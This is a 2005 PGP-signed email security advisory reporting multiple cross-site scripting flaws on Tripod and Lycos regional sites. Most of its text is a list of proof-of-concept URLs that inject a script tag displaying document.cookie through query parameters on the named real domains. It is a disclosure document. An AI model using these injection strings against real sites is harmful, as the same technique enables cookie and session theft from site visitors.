This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C53480.E4D6FC80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: Multiple xss vulnerabilities in Tripod.com Date: March 30, 2005 Site: http://www.tripod.com Summary: There are multiple XSS vulnerabilities in the Tripod.com Proof of Concept Exploit: http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D&query=3D= %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D%22%3E%= 3Cscript%3Ealert(document.cookie)%3C/script%3E&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&qu=3D&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3Cscript%3Eal= ert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&query=3D1 Pops cookie http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Ealert(docu= ment.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&query=3D1 Pops cookie http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E Pops cookie http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"> Pops cookie http://www.multimania.lycos.fr/search/?query=3Dphp&collection=3D">&action=3D1 Pops cookie http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3Cs= cript%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri= pt%3Ealert(document.cookie)%3C/script%3E&action=3D1 Pops cookie Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C 9FDhk4OgSnAljDh8yIdaJ1cj =3DqJY/ -----END PGP SIGNATURE----- ------=_NextPart_000_0005_01C53480.E4D6FC80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable